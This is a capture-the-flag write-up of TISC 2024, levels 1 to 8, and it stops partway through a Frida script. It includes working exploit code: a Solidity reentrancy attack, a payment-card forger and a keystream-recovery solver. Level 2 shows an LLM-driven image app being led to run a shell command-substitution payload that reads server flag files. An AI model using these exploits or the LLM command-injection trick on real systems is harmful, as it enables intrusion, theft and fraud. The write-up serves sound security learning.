TISC 2024

samuzora

TISC 2024 ran from 13th to 29th September this year, right after my prelims ended on the 13th. (I actually went cycling on the afternoon of 13th and got lost and only came home at midnight so I couldn’t play as I had planned)

Also before the CTF started I was already 1st place because of alphabetical order :). I knew I was fated to get 1st place.

Initial scoreboard
Initial scoreboard

In an act of heroic defiance, I defied fate and did not get 1st place, solving 11/12 of the challenges in the 16 day duration.

Final scoreboard
Final scoreboard

Here are my writeups for the 12 challenges in the CTF. I went the RE route instead of web/cloud this year, and it was pretty fun so I don’t regret it.

(I wrote some of these writeups in a hurry because of my upcoming IB finals that I need to study for - I’ll update them after my finals are over)

Navigating the Digital Labyrinth (Level 01)

The dust has settled since we won the epic battle against PALINDROME one year ago.

Peace returned to cyberspace, but it was short-lived. Two months ago, screens turned deathly blue, and the base went dark. When power returned, a mysterious entity glitched to life on our monitors. No one knows where it came from or what it plans to do.

Amidst the clandestine realm of cyber warfare, intelligence sources have uncovered the presence of a formidable adversary, Vivoxanderith—a digital specter whose footprint spans the darkest corners of the internet. As a skilled cyber operative, you are entrusted with the critical mission of investigating this elusive figure and their network to end their reign of disruption.

Recent breakthroughs have unveiled Vivoxanderith’s online persona: vi_vox223. This revelation marks a pivotal advancement in our pursuit, offering a significant lead towards identifying and neutralizing this threat.

Our mission now requires a meticulous investigation into vi_vox223’s activities and connections within the cyber underworld. Identifying and tracking Vivoxanderith brings us one crucial step closer to uncovering the source of the attack and restoring stability to our systems. It is up to you, agent!

Searching for the mysterious vi_vox223 using Sherlock, we see an Instagram profile with the same name. Under his stories, this elusive figure has created a Discord bot with ID 1284197383864979486. We have the exclusive opportunity to grace our server with the bot’s presence using this link:

https://discord.com/oauth2/authorize?client_id=1284197383864979486&permissions=0&scope=bot%20applications.commands

We need to have the elusive D0PP3L64N63R role to unlock the hidden menu. After that, we can access the filesystem and download the Update_030624.eml file.

Opening this file, there is an email attached:

Dear Headquarters,=20

I trust this message reaches you securely. I am writing to provide an =
update on my current location. I am currently positioned close to the =
midpoint of the following IDs:

=09
* 8c1e806a3ca19ff=20
=09
* 8c1e806a3c125ff=20
=09
* 8c1e806a3ca1bff=20

My location is pinpointed with precision using Uber's cutting-edge geo=
spatial technology, which employs shape-based location triangulation a=
nd partitions areas of the Earth into identifiable cells.

To initiate secure communication with me, please adhere to the discree=
t method we've established. Transmit the identified location's name th=
rough the secure communication channel accessible at https://www.linke=
din.com/company/the-book-lighthouse


Awaiting your confirmation and further operational directives.=20

Best regards,=20

Vivoxanderith

Using the location IDs provided, we can pinpoint the location to this:

aka Quercia secolare
aka Quercia secolare

We can also visit the Linkedin provided to access the secret agent under the guise of a Telegram bot with username @TBL_DictioNaryBot. Sending the identified location will confirm our identity and give us the flag.

TISC{OS1N7_Cyb3r_InV35t1g4t0r_uAhf3n}

Language, Labyrinth and (Graphics)Magick (Level 02)

Good job on identifying the source of the attack! We are one step closer to identifying the mysterious entity, but there’s still much we do not know.

Beyond Discord and Uber H3, seems like our enemies are super excited about AI and using it for image transformation. Your fellow agents have managed to gain access to their image transformation app. Is there anyyy chance we could find some vulnerabilities to identify the secrets they are hiding?

In this level, PALINDROME employs the power of LLMs to edit photographic evidences of their crimes. we’re provided with 1 web interface (3, actually, cos remote kept crashing) where we can upload images, specify some transformation on the image, and download the newly transformed image. It uses an LLM to generate GraphicsMagick commands which are run on the server (this is totally unnecessary and it is clear PALINDROME just wants to hop on the LLM bandwagon). We can get the LLM to generate our own GraphicsMagick commands like so:

gm convert <input> <output>

and the LLM will replace the input and output filenames accordingly. Neat!

In GraphicsMagick, we can add comments to images, which will append the string to the end of the image file - we can see this when we strings it. Since the command is being ran directly in the shell (bash presumably), we can use globbing to put the contents of flag.txt in the comments.

gm convert <input> -comment "$(cat /**/flag*.txt)" <output>

Uploading any image and entering this command, then downloading the image and running strings on it, will give us the flag.

TISC{h3re_1$_y0uR_pr0c3s5eD_im4g3_&m0Re}

Digging Up History (Level 03)

Ah, who exactly is behind the attacks? If only our enemies left more images on their image transformation server. We are one step closer, but there is still so much to uncover…

A disc image file was recovered from them! We have heard that they have a history of hiding sensitive data through file hosting sites… Can you help us determine what they might be hiding this time?

Looks like we got our hands on one of PALINDROME’s agent’s disk images… We’re provided with a huge 1.3GB csitfanUPDATED0509.ad1 file. We can use FTK Imager to open this and view the contents of the disk.

The title of the challenge hints towards checking out the user’s browser history, so we should do exactly that. Under the Documents and Settings folder, there are 2 browser folders - Mozilla and “Mypal68” (but the Mozilla folder was empty). Going to “Mypal68”, we can see 2 profiles - ibxh2pqf.default and a80ofn6a.default-default. The former is mostly empty, so let’s look at the latter, where we find the places.sqlite file. This file generally contains the browser history for Mozilla browsers - exactly what we wanted! Let’s extract this file and open it.

sqlite> select * from sqlite_master;
table|moz_origins|moz_origins|2|CREATE TABLE moz_origins ( id INTEGER PRIMARY KEY, prefix TEXT NOT NULL, host TEXT NOT NULL, frecency INTEGER NOT NULL, UNIQUE (prefix, host) )
index|sqlite_autoindex_moz_origins_1|moz_origins|3|
table|moz_places|moz_places|4|CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER , guid TEXT, foreign_count INTEGER DEFAULT 0 NOT NULL, url_hash INTEGER DEFAULT 0 NOT NULL , description TEXT, preview_image_url TEXT, origin_id INTEGER REFERENCES moz_origins(id))
index|moz_places_url_hashindex|moz_places|5|CREATE INDEX moz_places_url_hashindex ON moz_places (url_hash)
index|moz_places_hostindex|moz_places|6|CREATE INDEX moz_places_hostindex ON moz_places (rev_host)
index|moz_places_visitcount|moz_places|7|CREATE INDEX moz_places_visitcount ON moz_places (visit_count)
index|moz_places_frecencyindex|moz_places|8|CREATE INDEX moz_places_frecencyindex ON moz_places (frecency)
index|moz_places_lastvisitdateindex|moz_places|9|CREATE INDEX moz_places_lastvisitdateindex ON moz_places (last_visit_date)
index|moz_places_guid_uniqueindex|moz_places|10|CREATE UNIQUE INDEX moz_places_guid_uniqueindex ON moz_places (guid)
index|moz_places_originidindex|moz_places|11|CREATE INDEX moz_places_originidindex ON moz_places (origin_id)
...

Wow so many tables…

Luckily, the moz_places table was the only table we needed - when dumping the contents of this table, we see the following row:

17|https://csitfan-chall.s3.amazonaws.com/flag.sus|flag.sus|moc.swanozama.3s.llahc-naftisc.|0|0|0|0|1725522130630000|0Ds_Z7hyaY9W|0|47357524652742|||10

The downloaded file contains the Base64-encoded flag.

TISC{tru3_1nt3rn3t_h1st0r13_8445632pq78dfn3s}

AlligatorPay (Level 04)

In the dark corners of the internet, whispers of an elite group of hackers aiding our enemies have surfaced. The word on the street is that a good number of members from the elite group happens to be part of an exclusive member tier within AlligatorPay (agpay), a popular payment service.

Your task is to find a way to join this exclusive member tier within AlligatorPay and give us intel on future cyberattacks. AlligatorPay recently launched an online balance checker for their payment cards. We heard it’s still in beta, so maybe you might find something useful.

In this level, PALINDROME is using a service to conduct their shady money laundering schemes where we can upload an “AGPAY” card. The card validation is done client-side, so we can reverse the logic to create our own card. If our card’s balance is equal to 313371337, we will get the flag.

The card format has several things we need to look out for:

  1. Starts with AGPAY and ends with ENDAGP
  2. Has data corresponding to card_number + expiry_date + balance, encrypted using AES-CBC, with a key and IV of our choice
  3. Has a checksum of md5(encrypted_data + iv)

I pasted the script into Gemini and asked it to create a Python script for me. It was actually pretty good and I didn’t have to modify much to obtain a valid card!

import random
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

def generate_card_data(card_number, expiry_date, balance):
# Convert card data to binary format
card_number_bytes = card_number.encode()
expiry_date_bytes = expiry_date.encode()
balance_bytes = balance.to_bytes(8, byteorder='big')

# Combine card data
card_data = card_number_bytes + expiry_date_bytes + balance_bytes

return card_data

def encrypt_data(card_data, encryption_key, iv):
# Pad data to 16-byte boundary
padded_data = pad(card_data, AES.block_size)

# Create AES cipher object
cipher = AES.new(encryption_key, AES.MODE_CBC, iv)

# Encrypt card data
encrypted_data = cipher.encrypt(padded_data)

return encrypted_data

def calculate_checksum(encrypted_data, iv):
# Combine encrypted data and IV
combined_data = encrypted_data + iv

# Calculate md5 hash
hash_object = hashlib.md5()
hash_object.update(combined_data)
checksum = hash_object.digest()

return checksum

def create_agpay_file(card_data, encrypted_data, checksum, filename):
# Create file header
header = b"AGPAY01" + b"\x00" * 32 + b"\x00" * 10 + b"\x00" * 16

# Create file footer
footer = b"ENDAGP" + checksum

# Combine header, encrypted data, and footer
file_contents = header + encrypted_data + footer

# Write file contents to disk
with open(filename, "wb") as f:
f.write(file_contents)

if __name__ == "__main__":
# Generate card data
card_number = "1234567890123456"
expiry_date = "2025-12-31"
balance = 313371337

card_data = generate_card_data(card_number, expiry_date, balance)
encrypted_data = encrypt_data(card_data, b"\x00" * 32, b"\x00" * 16) # Null bytes for key and IV
checksum = calculate_checksum(encrypted_data, b"\x00" * 16)

# Create AGPAY file
filename = "card.txt"
create_agpay_file(card_data, encrypted_data, checksum, filename)

After generating our card and uploading it, we get our flag.

TISC{533_Y4_L4T3R_4LL1G4T0R_a8515a1f7004dbf7d5f704b7305cdc5d}

Hardware isn’t that Hard! (Level 05)

Shucks… it seems like our enemies are making their own silicon chips??!? They have decided to make their own source of trust, a TPM (Trusted Platform Module) or I guess their best attempt at it.

Your fellow agent smuggled one out for us to reverse engineer. Don’t ask us how we did it, we just did it, it was hard …

All we know so far is that their TPM connects to other devices using the i2c bus and does some security stuff inside. Agent! Your mission, should you choose to accept it, is to get us unparalleled intel by finding their TPM’s weakness and exfiltrating its secrets.

You will be provided with the following compressed flash dump:

  • MD5 (flash_dump.bin.xz) = fdff2dbda38f694111ad744061ca2f8a

Flash was dumped from the device using the command: esptool.py -p /dev/REDACTED -b 921600 read_flash 0 0x400000 flash_dump.bin

You can perform your attack on a live TPM module via the i2c implant device hosted behind enemy lines: nc chals.tisc24.ctf.sg 61622

We’re provided with a flash dump of the esp32 chip. The flash dump contains several partitions, including the app that we’re interested in. We can view these partitions using https://github.com/tenable/esp32_image_parser.

$ : esp32_image_parser.py show_partitions flash_dump.bin
reading partition table...
entry 0:
label : nvs
offset : 0x9000
length : 20480
type : 1 [DATA]
sub type : 2 [WIFI]

entry 1:
label : otadata
offset : 0xe000
length : 8192
type : 1 [DATA]
sub type : 0 [OTA]

entry 2:
label : app0
offset : 0x10000
length : 1310720
type : 0 [APP]
sub type : 16 [ota_0]

entry 3:
label : app1
offset : 0x150000
length : 1310720
type : 0 [APP]
sub type : 17 [ota_1]

entry 4:
label : spiffs
offset : 0x290000
length : 1441792
type : 1 [DATA]
sub type : 130 [unknown]

entry 5:
label : coredump
offset : 0x3f0000
length : 65536
type : 1 [DATA]
sub type : 3 [unknown]

MD5sum:
972dae2ff872a0142d60bad124c0666b
Done

And we can dump the app0 partition into an ELF file that we can reverse:

esp32_image_parser.py create_elf flash_dump.bin -partition app0 -output app0.elf

Unfortunately, the chip uses the xtensa instruction set, which IDA doesn’t support that well - we can’t decompile stuff nicely. But luckily, Ghidra is able to output nice decomp so we’ll use Ghidra instead!

I was hoping that the main function would be easy to find, but that’s not the case. In here, we start at the start function, which has a lot a lot of calls everywhere. Even worse, the binary is stripped so we don’t have proper function names. I tried to trace it but gave up after spending hours trying to identify the main function.

After clicking through Ghidra for pretty long, I found this banner string in .dram0.data that seems quite suspicious:

                                  s__3ffbdb8a                                     XREF[2,13]:  400d0058(*), 
s__3ffbdb8b actual_main:400d16d5(R),
s__3ffbdb8c 400d006c(*), 400d0070(*),
s__3ffbdb8d 400d0074(*), 400d0080(*),
s_BRYXcorp_CrapTPM_3ffbdb7a FUN_400d1964:400d196a(R),
FUN_400d1964:400d1975(R),
FUN_400d199c:400d19aa(W),
FUN_400d19b4:400d19cf(W),
FUN_400d19d8:400d19ed(R),
FUN_400d19d8:400d19f6(R),
FUN_400d1a14:400d1a4e(R),
FUN_400d1a64:400d1ad1(R),
FUN_400d1b04:400d1b2c(R)
3ffbdb7a 42 52 59 ds "BRYXcorp_CrapTPM",01h,"\f",03h,03h
58 63 6f
72 70 5f

This string seems like a likely banner output from the chip when we interact with it. We can jump to its xrefs to find our main function.

void FUN_400d1614(uint param_1) {
byte bVar1;
int iVar2;
int iVar3;
byte bVar4;
uint uVar5;
int iVar6;
int in_WindowStart;
undefined auStack_30 [12];
uint uStack_24;

memw();
memw();
uStack_24 = _DAT_3ffc20ec;
FUN_400d36ec(0x3ffc1ecc,s_i2c_recv_%d_byte(s):_3f400163,param_1);
iVar2 = (uint)(in_WindowStart == 0) * (int)auStack_30;
iVar3 = (uint)(in_WindowStart != 0) * (int)(auStack_30 + -(param_1 + 0xf & 0xfffffff0));
FUN_400d37e0(0x3ffc1cdc,iVar2 + iVar3,param_1);
FUN_400d2fa8(iVar2 + iVar3,param_1);
if (0 < (int)param_1) {
uVar5 = (uint)*(byte *)(iVar2 + iVar3);
if (uVar5 != 0x52) goto LAB_400d1689;
memw();
uRam3ffc1c80 = 0;
}
while( true ) {
uVar5 = uStack_24;
param_1 = _DAT_3ffc20ec;
memw();
memw();
if (uStack_24 == _DAT_3ffc20ec) break;
func_0x40082818();
LAB_400d1689:
if (uVar5 == L'F') {
iVar6 = 0;
do {
memw();
bVar1 = (&DAT_3ffbdb6a)[iVar6];
bVar4 = FUN_400d1508();
memw();
*(byte *)(iVar6 + 0x3ffc1c80) = bVar1 ^ bVar4;
iVar6 = iVar6 + 1;
} while (iVar6 != 0x10);
}
else if (uVar5 == L'M') {
memw();
uRam3ffc1c80 = DAT_3ffbdb7a;
memw();
}
else if ((param_1 != 1) && (uVar5 == L'C')) {
memw();
bVar1 = *(byte *)(*(byte *)(iVar2 + iVar3 + 1) + 0x3ffbdb09);
bVar4 = FUN_400d1508();
memw();
(&DAT_3ffc1c1f)[*(byte *)(iVar2 + iVar3 + 1)] = bVar1 ^ bVar4;
}
}
return;
}

Some comparisons are being made, presumably against our input. So that’s how we can interact with the chip - by sending a byte of either F, M or C. The protocol is using the I2C protocol, which according to Wikipedia and the instructions provided on remote, consists of a 2 byte data stream. The 1st byte is used to specify the direction of data transfer (read or write) and the address of the chip, while the second byte is the data itself. Since we also need to receive output from the bus, reading is a 2-step process - first read from the chip into the bus, then from the bus into console.

I used the following to guess the address of the chip:

for i in range(0x7f):
target = bin(i)[2:].rjust(7, "0")
target += "0"
target = hex(int(target, 2))[2:].rjust(2, "0")
payload = f"SEND {target} 4d"
print(payload)
p.sendlineafter(b">", payload.encode())

target = bin(i)[2:].rjust(7, "0")
target += "1"
target = hex(int(target, 2))[2:].rjust(2, "0")
payload = f"SEND {target} 00"
p.sendlineafter(b">", payload.encode())

p.sendlineafter(b">", b"RECV 32")
output = p.recvline().strip()
if output != (b"00 " * 32).strip():
print(i, output)

When we interact with the “F” endpoint, we get a random string of data that is probably the encrypted flag. Upon initialization, the chip randomly generates a seed key that is later processed and used to encrypt the flag. Based on this, we can determine the possible keys based on the flag format, and narrow down the possible keys after each encryption, until we have the final key which we can use to decrypt the flag.

I used this script to interact with the chip and read the flag:

from pwn import *

p = remote("chals.tisc24.ctf.sg", 61622)
p.recvuntil(b"Read More:")

# device found: 105 (0x69)
dev_num = 0x69

def send(val):
target = bin(dev_num)[2:].rjust(7, "0")
target += "0"
target = hex(int(target, 2))[2:].rjust(2, "0")

data = hex(val)[2:].rjust(2, "0")

payload = f"SEND {target} {data}"
print(payload)
p.sendlineafter(b">", payload.encode())

def read():
target = bin(dev_num)[2:].rjust(7, "0")
target += "1"
target = hex(int(target, 2))[2:].rjust(2, "0")
payload = f"SEND {target} 00"
p.sendlineafter(b">", payload.encode())

p.sendlineafter(b">", b"RECV 16")
return p.recvline().strip()

send(0x46)
output = read()
output = output.split(b" ")
print(output)

output = [int(x, 16) for x in output]

# determine initial state from the first 5 known bytes
possible_states = []
known = b"TISC{"

# we don't know the 1st byte
for i in range(0xffff + 1):
if (i ^ known[0]) & 0xff == output[0]:
possible_states.append(i)

print(len(possible_states))
print([hex(i) for i in possible_states])

for i in range(1, len(known)):
c = output[i] ^ known[i]

new_possible_states = []
for j in possible_states:
u1 = (j & 0xffff) << 7 ^ (j & 0xffff)
u1 = (u1 & 0xffff) >> 9 ^ (u1 & 0xffff)
final = (u1 & 0xffff) << 8 ^ (u1 & 0xffff)
new_possible_states.append(final)

possible_states = new_possible_states
print([hex(i) for i in possible_states])

to_remove = []
for j in possible_states:
if ((j & 0xffff) ^ known[i]) & 0xff != output[i]:
to_remove.append(j)

for j in to_remove:
possible_states.remove(j)

print(len(possible_states))

# decrypt the rest!
flag = [i for i in known]

cur = new_possible_states[0]
for i in range(5, len(output)):
u1 = (cur & 0xffff) << 7 ^ (cur & 0xffff)
u1 = (u1 & 0xffff) >> 9 ^ (u1 & 0xffff)
final = (u1 & 0xffff) << 8 ^ (u1 & 0xffff)
cur = final

d = ((cur & 0xffff) ^ output[i]) & 0xff
print(hex(d))
flag.append(d)

print("".join([chr(i) for i in flag]))

# TISC{hwfuninnit}

RE Path - Noncevigator (Level 06)

I guess their Trusted Platform Modules were not so trusted afterall. What about blockchain? Blockchain is secure by design, right?

It seems like our enemies may have hidden some of their treasures somewhere along in our little island, all secured by this blockchain technology.

We have heard rumours that to access the treasure, you must navigate to the correct location and possess the correct value of the “number used only once”. This unique code is essential for unlocking the fortified gate guarding the treasure!

Ensure your wallet is sufficiently funded for travel and any potential challenges you may encounter. Your journey begins now. It’s your mission now - crack the code and see what treasures they are hiding!

This was strangely not an RE challenge but a blockchain/pwn challenge. The main 2 vulnerabilities are here:

function withdraw() external {
uint256 balance = getUserBalance(msg.sender);
require(balance > 0, "Insufficient balance");

(bool success, ) = msg.sender.call{value: balance}("");
require(success, "Failed to withdraw Ether");

userBalances[msg.sender] = 0;
}

We can do a reentrancy attack here. I used the following to withdraw all the funds:

function withdraw() external {
msg.sender.call{value: address(this).balance}("");
}

receive() external payable {
if (address(this).balance <= 170 ether) {
travelFundvault.withdraw();
}
}

Once we have sufficient funds, we can call the startUnlockingGate function.

travelFundVaultAddr = tfvAddr;
treasureLocations["hindhede"] = hindhedeAddr;
treasureLocations["coneyIsland"] = coneyIslandAddr;
treasureLocations["pulauSemakau"] = pulauSemakauAddr;
isLocationOpen["coneyIsland"] = true;

function startUnlockingGate(string calldata _destination) public {
require(treasureLocations[_destination] != address(0));
require(msg.sender.balance >= 170 ether);

(bool success, bytes memory retValue) =
treasureLocations[_destination].delegatecall(abi.encodeWithSignature("unlockgate()"));
require(success, "Denied entry!");
require(abi.decode(retValue, (bool)), "Cannot unlock gate!");
}

And here, there isn’t actually any function called “unlockgate()” in the contract (the contracts for treasureLocations were not released). Eventually, we need to deploy our own contract to implement this function.

But how do we deploy our own contract to the hardcoded addresses? When generating an address for a contract deployment using the CREATE opcode (not CREATE2), the EVM takes into account the deployer’s address and a nonce that increments every time a contract is deployed. This address is thus deterministic and can even be controlled partially by the attacker. We can write a script to bruteforce a possible nonce value that will give us one of the contract’s addresses:

import rlp
from sha3 import keccak_256

sender = bytes.fromhex("0x7cd3cB56F3DaE8825eF0ebA1916eE98D4bcb80E8"[2:])

desired = [
"0xb3ccA2077c824C19bd689616b8399230057a5a1D", # coneyIsland
"0xfba9b795E98591Be941BD41C57D2072Ada028B23", # pulauSemakau
"0xb9d877eFF9430734d2C4653ed389FEB6DF5F3A36" # hindhede
]

desired = [d[2:].lower() for d in desired]

def gen_contract_addr(sender, nonce):
return keccak_256(rlp.encode([sender, nonce])).hexdigest()[-40:]

for nonce in range(2, 2 ** 256):
if gen_contract_addr(sender, nonce) in desired:
print(nonce, gen_contract_addr(sender, nonce))
break

From this, pulauSemakau’s address seems to be manually set by the challenge to be achievable within a small nonce (30-50). So we can repeatedly deploy contracts until we deploy a contract at the required nonce value.

What can we do with the unlockGate call? Since it’s being called with delegatecall, the memory layout of the calling contract is inherited directly by the callee. So, we can edit the isLocationOpen to directly set pulauSemakau to true and get the flag.

Full exploit contracts:

pragma solidity ^0.8.19;
import { Noncevigator, TravelFundvault } from "./Noncevigator.sol";

// 1. run solve.py to generate the correct nonce
// 2. deploy Exploit to get enough ether, and extract all funds
// 3. set wallet nonce to the value
// 4. deploy Unlocker at the desired address
// 5. from wallet, call startUnlockingGate("pulauSemakau")

// 46
// TISC{ReeN7r4NCY_4ND_deTerminI5TIc_aDDReSs}

contract Exploit {
Noncevigator public noncevigator;
TravelFundvault public travelFundvault;

constructor(address _Noncevigator) {
noncevigator = Noncevigator(_Noncevigator);
travelFundvault = TravelFundvault(noncevigator.getVaultLocation());
}

function execute() external payable {
travelFundvault.deposit{value: msg.value}();
travelFundvault.withdraw();
}

function solve() external payable {
noncevigator.startUnlockingGate("pulauSemakau");
}

function withdraw() external {
msg.sender.call{value: address(this).balance}("");
}

function getCode(address target) external returns (bytes memory o_code) {
return target.code;
}

receive() external payable {
if (address(this).balance <= 170 ether) {
travelFundvault.withdraw();
}
}
}

contract Unlocker {
mapping(string => address) private treasureLocations;
mapping(string => bool) public isLocationOpen;
address private travelFundVaultAddr;
bool isCompassWorking;

function unlockgate() external returns (bool) {
isLocationOpen["pulauSemakau"] = true;
return true;
}
}

RE Path - Baby Flagchecker (Level 07)

You’ve come so far, brave agents! Let us continue our mission to identify our threats, and retrieve the crucial information that they are hiding from the world.

While scanning their network, your fellow agents chanced upon a tool used by the adversary that checks for the validity of a secret passphrase.

We know that they use this phrase for establishing communications between one another, but the one we have is way outdated… It’s time for an update.

This level had a bit a difficult RE but it was partly a blockchain chall too. Seems like PALINDROME really likes blockchain…

The web interface has SSTI that allows us to view the entire response data object from this function. Unfortunately we can’t use this for RCE because it limits our input length to 32, which is too short for an RCE payload.

def call_check_password(setup_contract, password):
# Call checkPassword function
passwordEncoded = '0x' + bytes(password.ljust(32, '\0'), 'utf-8').hex()

# Get result and gas used
try:
gas = setup_contract.functions.checkPassword(passwordEncoded).estimate_gas()
output = setup_contract.functions.checkPassword(passwordEncoded).call()
logger.info(f'Gas used: {gas}')
logger.info(f'Check password result: {output}')
except Exception as e:
logger.error(f'Error calling checkPassword: {e}')

# Return debugging information
return {
"output": output,
"contract_address": setup_contract.address,
"setup_contract_bytecode": os.environ['SETUP_BYTECODE'],
"adminpanel_contract_bytecode": os.environ['ADMINPANEL_BYTECODE'],
"secret_contract_bytecode": os.environ['SECRET_BYTECODE'],
"gas": gas
}

setup_contract_bytecode and adminpanel_contract_bytecode are the partial bytecodes of the respective contracts. I used https://ethervm.io/decompile to decompile the bytecode into semi-readable Solidity code, but it wasn’t really helpful. In the end, I painfully parsed the assembly step-by-step to figure out the stack state and stuff.

After hours of reversing, my revelation was that in the assembly for adminpanel, we can see that it checks if the input is of length 16. If so, it slices off the TISC prefix here:

0023    60    PUSH1 0x04
0025 35 CALLDATALOAD

and calls the secret contract to get the flag (I think, we can’t actually tell from the delegatecall).

0000    5F    PUSH0
0001 35 CALLDATALOAD
0002 80 DUP1
0003 60 PUSH1 0xd8
0005 1C SHR
0006 64 PUSH5 0x544953437b
000C 14 EQ // check if input starts with TISC{
000D 81 DUP2
000E 60 PUSH1 0x80
0010 1B SHL
0011 60 PUSH1 0xf8
0013 1C SHR
0014 60 PUSH1 0x7d
0016 14 EQ // check if input[15] == }
// ...
0043 60 PUSH1 0x20
0045 5F PUSH0
0046 60 PUSH1 0x04
0048 60 PUSH1 0x3c
004A 84 DUP5 // calldata[0x24:0x24 + 0x32] --> address of delegatecall
004B 5A GAS
// likely call secret contract to get the flag
// mem[0x0:0x20] = address(calldata[0x24:0x24 + 0x32]).delegatecall(memory[0x4:0x40])
004C F4 DELEGATECALL
004D 50 POP
004E 5F PUSH0
004F 51 MLOAD
0050 5F PUSH0
0051 5F PUSH0

Afterwards, it does some comparison stuff here:

0064    60    PUSH1 0x0d // for loop until 0xd
0066 14 EQ
0067 61 PUSH2 0x0078
006A 57 *JUMPI
006B 90 SWAP1
006C 61 PUSH2 0x0052
006F 56 *JUMP
0070 5B JUMPDEST
0071 60 PUSH1 0x01 // tos += 1
0073 01 ADD //
0074 61 PUSH2 0x005e
0077 56 *JUMP
0078 5B JUMPDEST
0079 81 DUP2
007A 60 PUSH1 0x0d
007C 14 EQ
007D 60 PUSH1 0x40
007F 52 MSTORE
0080 60 PUSH1 0x20
0082 60 PUSH1 0x40
0084 F3 *RETURN

I’m not sure why, but apparently matching each character spends a bit more gas. So based on the gas usage which we can see via the SSTI, we can sequentially determine each character of the flag. Each time the gas increases, we know that character is correct.

This is the payload I used:

{_________}{{response_data}}
TISC{g@s_Ga5_94S}

Wallfacer (Level 08)

Breaking news! We’ve managed to seize an app from their device.

It seems to be an app that stores user data, but doesn’t seem to do much other than that… The other agent who recovered this said he heard them say something about parts of the app are only loaded during runtime, hiding crucial details.

It’s up to you now! Can you break through the walls and unveil the hidden secrets within this app?

Is PALINDROME secretly the Earth-Trisolaris Organization??

We’re provided with an Android app which seems to be a very useless input field that does nothing but store the input in-memory. Opening the APK in JADX, we can see a hidden activity in AndroidManifest.xml (com.wall.facer.query). We can manually load this activity in Android Studio to reveal a activity that requests for a IV and secret key, to decrypt the flag.

Also, we can see a few suspicious values in res/values/strings.xml.

<string name="base">d2FsbG93aW5wYWlu</string>
<string name="dir">ZGF0YS8</string>
<string name="filename">c3FsaXRlLmRi</string>
<string name="str">4tYKEbM6WqQcItBx0GMJvssyGHpVTJMhpjxHVLEZLVK6cmIH7jAmI/nwEJ1gUDo2</string>
<string name="submit">Submit</string>
<string name="tag">TISC</string>

The base64 values are wallowinpain, data/ and sqlite.db respectively. Unzipping the APK and going to the assets folder, we can see the sqlite.db and several strange files in data/:

$ : ls
# name type size modified
─────────────────────────────────────────────────────────────
0 0$d4a1NDA5TkDcvPPA_97qGA file 1.4 KB 43 years ago
1 1$-jdd8_tomhupBCl9KWd8xA file 1.3 KB 43 years ago
2 2$lFLwXjQ9kfzjBqIAI43f-Q file 2.1 KB 43 years ago
3 3$JwwVFYd1_JvfrcL91sUOoQ file 1.2 KB 43 years ago
4 4$Xz61-8GuN_p5gECXlLwIyA file 1.8 KB 43 years ago
5 5$Je3mRGwJ1MvkQ-ZXfApZgQ file 1.9 KB 43 years ago
6 6$KrPqTP4Iu8-DNlpja70rcA file 1.2 KB 43 years ago
7 7$K30_BnqsT-e6-qRdbWhW4Q file 1.4 KB 43 years ago
8 8$svSIG6hueT4M509sCJTACQ file 709 B 43 years ago

sqlite.db is not a valid SQLite database (though it has the SQLite 3 magic bytes) and trying to open it gives an error. I spent a good amount of time thinking the db was encrypted and tried to decrypt it to no avail.

After digging in JADX a bit, I found this really suspicious function that seems to be reading a file and decrypting it:

public C0289q1(byte[] bArr) {
this.a = 17;
this.b = bArr;
this.c = new byte[256];
for (int i = 0; i < 256; i++) {
((byte[]) this.c)[i] = (byte) i;
}
int i2 = 0;
for (int i3 = 0; i3 < 256; i3++) {
byte[] bArr2 = (byte[]) this.c;
byte b = bArr2[i3];
byte[] bArr3 = (byte[]) this.b;
i2 = (i2 + (b & 255) + (bArr3[i3 % bArr3.length] & 255)) & 255;
bArr2[i3] = bArr2[i2];
bArr2[i2] = b;
}
}
public static ByteBuffer K(Context context, String str) {
int i2;
// opens from the assets/ folder
InputStream open = context.getAssets().open(str);
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
byte[] bArr = new byte[1024];
while (true) {
int read = open.read(bArr);
if (read == -1) {
break;
}
byteArrayOutputStream.write(bArr, 0, read);
}
open.close();
byte[] byteArray = byteArrayOutputStream.toByteArray();
byte[] bArr2 = new byte[128];
byte[] bArr3 = new byte[4];
System.arraycopy(byteArray, 4096, bArr3, 0, 4);
int i3 = ByteBuffer.wrap(bArr3).getInt();
byte[] bArr4 = new byte[i3];
System.arraycopy(byteArray, 4100, bArr4, 0, i3);
System.arraycopy(byteArray, 4100 + i3, bArr2, 0, 128);
C0289q1 c0289q1 = new C0289q1(bArr2);
byte[] bArr5 = new byte[i3];
int i4 = 0;
int i5 = 0;
for (i2 = 0; i2 < i3; i2++) {
i4 = (i4 + 1) & 255;
byte[] bArr6 = (byte[]) c0289q1.c;
byte b2 = bArr6[i4];
i5 = (i5 + (b2 & 255)) & 255;
bArr6[i4] = bArr6[i5];
bArr6[i5] = b2;
bArr5[i2] = (byte) (bArr6[(bArr6[i4] + b2) & 255] ^ bArr4[i2]);
}
return ByteBuffer.wrap(bArr5);
}

Most likely, this function is decrypting the mysterious sqlite.db file. Using Frida, I re-implemented the 2 sections in JS using the wrapper provided:

function ByteBufferToInt(byteArray) {
// Ensure the byte array has at least 4 bytes
console.log(byteArray, byteArray.length)
if (byteArray.length < 4) {
throw new Error("ByteBuffer must contain at least 4 bytes.");
}

// Extract the 4 bytes
const view = new DataView(new Uint8Array(byteArray).buffer);
const value = view.getInt32(0); // Little-endian by default

// Return the integer value
return value;
}

class C0289q1 {
constructor(bArr) {
this.a = 17
this.b = bArr
this.c = []
for (let i = 0; i < 256; i++) {
this.c[i] = i
}

let i2 = 0
for (let i = 0; i < 256; i++) {
let bArr2 = this.c
let b = bArr2[i]
let bArr3 = this.b

i2 = (i2 + (b & 255) + (bArr3[i % bArr3.length] & 255)) & 255
bArr2[i] = bArr2[i2]
bArr2[i2] = b
}
}
}

// ...
// attach to mainActivity

const filename = "sqlite.db"

const inputStream = assetManager.open(filename)
const byteArrayOutputStream = Java.use("java.io.ByteArrayOutputStream").$new()
let buffer = Java.array('byte', [1024])
while (true) {
let length = inputStream.read(buffer)
if (length < 0) {
break
}
byteArrayOutputStream.write(buffer, 0, length)
}
let _bytes = byteArrayOutputStream.toByteArray()

let bytes = []
